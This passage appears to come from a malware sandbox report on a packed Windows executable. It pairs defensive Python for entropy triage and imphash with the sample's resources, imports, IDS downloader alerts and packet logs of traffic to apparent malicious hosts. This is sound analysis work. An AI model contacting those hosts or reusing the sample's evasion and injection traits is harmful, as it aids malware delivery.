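the report's section sizes; its contents are synthetic (the sample's bytes are not on the page).
"""
import hashlib
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FILE_ALIGNMENT, SECTION_ALIGNMENT = 0x200, 0x1000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes):
    """Walk DOS header -> PE signature -> file header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        flags = struct.unpack_from("<I", image, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va, "raw_size": raw_size,
                         "characteristics": flags, "data": image[raw_ptr:raw_ptr + raw_size]})
    return sections


def triage_sections(image: bytes, entropy_threshold=7.0, ratio_threshold=4.0):
    """Return {section name: [reasons]} for every section that trips a check."""
    findings = {}
    for s in parse_sections(image):
        reasons = []
        ent = shannon_entropy(s["data"])
        if ent > entropy_threshold:          # compressed or encrypted payload
            reasons.append(f"high entropy {ent:.2f}")
        if s["raw_size"] and s["virtual_size"] / s["raw_size"] > ratio_threshold:
            # far more memory mapped than bytes on disk: room reserved for unpacked code
            reasons.append(f"VirtualSize/RawSize {s['virtual_size'] / s['raw_size']:.0f}x")
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            reasons.append("writable and executable")
        if reasons:
            findings[s["name"]] = reasons
    return findings


def pseudo_random(n: int, seed: bytes) -> bytes:
    """Deterministic high-entropy filler: SHA-256 in counter mode."""
    out = bytearray()
    for counter in range(-(-n // 32)):
        out += hashlib.sha256(seed + counter.to_bytes(4, "little")).digest()
    return bytes(out[:n])


def build_sample_pe(sections) -> bytes:
    """Constructed PE32 (headers in the first 0x400 bytes, as in the report's sample).
    sections: list of (name, virtual_size, raw_bytes, characteristics)."""
    headers_size, opt_size, e_lfanew = 0x400, 0xE0, 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                              # PE32 magic
    struct.pack_into("<II", opt, 32, SECTION_ALIGNMENT, FILE_ALIGNMENT)
    table, body, va, raw_ptr = bytearray(), bytearray(), SECTION_ALIGNMENT, headers_size
    for name, vsize, data, flags in sections:
        raw_size = -(-len(data) // FILE_ALIGNMENT) * FILE_ALIGNMENT
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, va,
                             raw_size, raw_ptr, 0, 0, 0, 0, flags)
        body += data.ljust(raw_size, b"\0")
        va += -(-max(vsize, raw_size) // SECTION_ALIGNMENT) * SECTION_ALIGNMENT
        raw_ptr += raw_size
    head = dos + b"PE\0\0" + file_hdr + bytes(opt) + bytes(table)
    return head.ljust(headers_size, b"\0") + bytes(body)


# Constructed layout mirroring the report's section table; the bytes are synthetic.
SAMPLE_PE = build_sample_pe([
    (b".text", 0x4DB1C, pseudo_random(0x4DB1C, b"packed code"),
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".rdata", 0x205C, (b"This program cannot be run in DOS mode\r\n" * 210)[:0x205C],
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data", 0x3DB0D8, b"\0" * 0x6C00,
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    for name, reasons in triage_sections(SAMPLE_PE).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The thresholds (entropy above 7.0, virtual size more than four times the raw size) are the assumed defaults of this example, not values the sandbox publishes; on the constructed image .text trips the entropy check and .data the size-ratio check, while .rdata passes both, which is the same verdict the report's table gives for the real file. Run it against a real PE by passing the file's bytes to triage_sections.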
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x4391a8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.7368421052631579
RT_CURSOR | 0x4392d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.06130705394190871
RT_CURSOR | 0x43b8a8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
RT_ICON | 0x42e6f0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Syriac | Syriac | 0.357409381663113
RT_ICON | 0x42f598 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Syriac | Syriac | 0.5058664259927798
RT_ICON | 0x42fe40 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Syriac | Syriac | 0.5829493087557603
RT_ICON | 0x430508 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Syriac | Syriac | 0.6184971098265896
RT_ICON | 0x430a70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Syriac | Syriac | 0.35201688555347094
RT_ICON | 0x431b18 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Syriac | Syriac | 0.3471311475409836
RT_ICON | 0x4324a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Syriac | Syriac | 0.399822695035461
RT_ICON | 0x432970 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Syriac | Syriac | 0.8384861407249466
RT_ICON | 0x433818 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Syriac | Syriac | 0.8628158844765343
RT_ICON | 0x4340c0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Syriac | Syriac | 0.7966589861751152
RT_ICON | 0x434788 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Syriac | Syriac | 0.8432080924855492
RT_ICON | 0x434cf0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Syriac | Syriac | 0.8053941908713693
RT_ICON | 0x437298 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Syriac | Syriac | 0.8330206378986866
RT_ICON | 0x438340 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Syriac | Syriac | 0.8442622950819673
RT_ICON | 0x438cc8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Syriac | Syriac | 0.8599290780141844
RT_DIALOG | 0x43c920 | 0x84 | data | | | 0.7651515151515151
RT_STRING | 0x43c9a8 | 0x42c | data | | | 0.45318352059925093
RT_STRING | 0x43cdd8 | 0x122 | data | | | 0.5206896551724138
RT_STRING | 0x43cf00 | 0x7c0 | data | | | 0.4264112903225806
RT_STRING | 0x43d6c0 | 0x768 | data | | | 0.4272151898734177
RT_STRING | 0x43de28 | 0x8e4 | data | | | 0.4147627416520211
RT_STRING | 0x43e710 | 0x728 | data | | | 0.4268558951965066
RT_STRING | 0x43ee38 | 0x78a | data | | | 0.4227979274611399
RT_STRING | 0x43f5c8 | 0x79a | data | | | 0.41778006166495374
RT_STRING | 0x43fd68 | 0x4a6 | data | | | 0.4588235294117647
RT_GROUP_CURSOR | 0x43b880 | 0x22 | data | | | 1.088235294117647
RT_GROUP_CURSOR | 0x43c750 | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0x439130 | 0x76 | data | Syriac | Syriac | 0.6779661016949152
RT_GROUP_ICON | 0x432908 | 0x68 | data | Syriac | Syriac | 0.7115384615384616
RT_VERSION | 0x43c768 | 0x1b8 | COM executable for DOS | | | 0.5681818181818182
DLL | Import
KERNEL32.dll | GetFileSize, SetDefaultCommConfigA, WriteConsoleOutputCharacterW, UpdateResourceA, DeleteVolumeMountPointA, InterlockedIncrement, InterlockedDecrement, Process32First, SetComputerNameW, SetEvent, GetProcessPriorityBoost, GetModuleHandleW, GetCommandLineA, GetEnvironmentStrings, GlobalAlloc, GetConsoleAliasExesLengthW, WriteConsoleOutputA, GetFileAttributesA, GetTimeFormatW, GetConsoleAliasW, GetModuleFileNameW, SetLastError, GetProcAddress, SetFileAttributesA, GetAtomNameA, LoadLibraryA, RegisterWaitForSingleObject, AddAtomA, FoldStringW, GetModuleHandleA, SetLocaleInfoW, OpenFileMappingW, BuildCommDCBA, GetVersionExA, WriteProcessMemory, LCMapStringW, LCMapStringA, GetLastError, HeapFree, HeapAlloc, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, MultiByteToWideChar, GetStringTypeW
USER32.dll | GetClassLongW, GetMonitorInfoW
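The Import Hash field in the static information above is the imphash, an MD5 over the canonicalised import list that is commonly used to pivot between samples built from the same source or packer stub; the two imports that matter for this sample's behaviour, WriteProcessMemory and Process32First, are part of that list. The code below is an added example, not from the report, and implements the hash the way the pefile library defines it. It feeds in a subset of the report's KERNEL32.dll/USER32.dll imports in the order printed above; running it on the complete listing is what would reproduce the report's value. Ordinal-only imports are not handled here (pefile resolves some of them through built-in name tables), so binaries that import by ordinal need that additional step.

```python
"""Import hash (imphash) as pefile computes it, for pivoting on the report's Import Hash field.
Added example, not from the report. Canonical form: module lower-cased with a .dll/.ocx/.sys
suffix removed, function lower-cased, "module.function" entries joined by commas in
import-table order, MD5 of the result. Imports by ordinal are not handled here.
"""
import hashlib

STRIPPED_EXTENSIONS = (".dll", ".ocx", ".sys")


def canonical_module(name: str) -> str:
    """Lower-case the module name and drop a .dll/.ocx/.sys suffix."""
    name = name.lower()
    for ext in STRIPPED_EXTENSIONS:
        if name.endswith(ext):
            return name[:-len(ext)]
    return name


def imphash(imports) -> str:
    """imports: sequence of (module, [function names]) in import-table order."""
    entries = [f"{canonical_module(mod)}.{func.lower()}"
               for mod, funcs in imports for func in funcs]
    return hashlib.md5(",".join(entries).encode("ascii")).hexdigest()


# Subset of the import listing printed in the report, keeping the report's order.
SAMPLE_IMPORTS = [
    ("KERNEL32.dll", ["GetFileSize", "SetDefaultCommConfigA", "Process32First",
                      "GetProcAddress", "LoadLibraryA", "WriteProcessMemory",
                      "IsDebuggerPresent"]),
    ("USER32.dll", ["GetClassLongW", "GetMonitorInfoW"]),
]

if __name__ == "__main__":
    print(imphash(SAMPLE_IMPORTS))
```

Two properties follow from the canonicalisation and are worth remembering when comparing hashes across tools: case differences in module or function names do not change the result, but the order of DLLs and of functions within a DLL does, so two builds that import the same set of APIs in a different order get different imphashes.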
Language of compilation system | Country where language is spoken | Map
Syriac | Syriac |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T18:58:42.967098+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49724 | 172.67.179.207 | 443 | TCP
2024-12-10T18:58:44.541123+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49725 | 176.113.115.19 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 18:58:40.998541117 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:40.998572111 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:40.998630047 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:41.010391951 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:41.010410070 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.240080118 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.240309954 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.410201073 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.410232067 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.410629988 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.410681009 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.416086912 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.463337898 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.967118025 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.967187881 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.967204094 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.967248917 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.967261076 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.967305899 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.967315912 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.967354059 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.969296932 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.969309092 CET | 443 | 49724 | 172.67.179.207 | 192.168.2.8
Dec 10, 2024 18:58:42.969357014 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:42.969568968 CET | 49724 | 443 | 192.168.2.8 | 172.67.179.207
Dec 10, 2024 18:58:43.090094090 CET | 49725 | 80 | 192.168.2.8 | 176.113.115.19
Dec 10, 2024 18:58:43.210134983 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:43.210273027 CET | 49725 | 80 | 192.168.2.8 | 176.113.115.19
Dec 10, 2024 18:58:43.210449934 CET | 49725 | 80 | 192.168.2.8 | 176.113.115.19
Dec 10, 2024 18:58:43.330401897 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.540997028 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541011095 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541018963 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541122913 CET | 49725 | 80 | 192.168.2.8 | 176.113.115.19
Dec 10, 2024 18:58:44.541322947 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541383982 CET | 49725 | 80 | 192.168.2.8 | 176.113.115.19
Dec 10, 2024 18:58:44.541547060 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541552067 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541563988 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541569948 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
Dec 10, 2024 18:58:44.541575909 CET | 80 | 49725 | 176.113.115.19 | 192.168.2.8
                                                  Dec 10, 2024 18:58:44.541603088 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.541634083 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.542485952 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.542541981 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.660711050 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.660787106 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.660852909 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.660854101 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.665405035 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.665472984 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.665504932 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.665532112 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.733081102 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.733128071 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.733165979 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.733226061 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.737202883 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.737260103 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.737509012 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.737560034 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.745729923 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.745805025 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.748785973 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.748850107 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.749196053 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.749398947 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.757231951 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.757294893 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.757642984 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.757693052 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.766654968 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.766762018 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.768762112 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.768912077 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.774169922 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.774312019 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.775371075 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.775593042 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.782612085 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.782685041 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.783929110 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.783998966 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.791625977 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.791640997 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.791702032 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.799384117 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.799453974 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.800470114 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.800570011 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.807961941 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.808141947 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.808871984 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.808871984 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.815882921 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.816097975 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.816971064 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.817024946 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.823672056 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.823905945 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.925338984 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.925431013 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.926012039 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.926069975 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.926673889 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.926727057 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.926820040 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.926881075 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.931366920 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.931464911 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.931493044 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.931575060 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.935966969 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.936009884 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.936074018 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.936106920 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.940663099 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.940749884 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.940782070 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.940826893 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.945684910 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.945774078 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.945919037 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.945982933 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.950035095 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.950047016 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.950093985 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.954360008 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.954406977 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.954426050 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.954447985 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.958964109 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.959029913 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.959414005 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.959481001 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.963603020 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.963610888 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.963649035 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.963738918 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.968147993 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.968199968 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.968214035 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.968293905 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.972737074 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.972800016 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.972815037 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.972863913 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.977269888 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.977344036 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.977461100 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.977507114 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.982006073 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.982038021 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.982064962 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.982105017 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.986823082 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.986833096 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.986881971 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.991444111 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.991465092 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.991508007 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.991523981 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.995790005 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.995898962 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:44.995975018 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:44.996021986 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.000391960 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.000411987 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.000443935 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.000484943 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.005096912 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.005109072 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.005233049 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.009519100 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.009583950 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.009666920 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.009721041 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.014239073 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.014265060 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.014295101 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.014697075 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.018794060 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.019309044 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.119363070 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.119412899 CET8049725176.113.115.19192.168.2.8
                                                  Dec 10, 2024 18:58:45.119452000 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.119483948 CET4972580192.168.2.8176.113.115.19
                                                  Dec 10, 2024 18:58:45.121516943 CET8049725176.113.115.19192.168.2.8
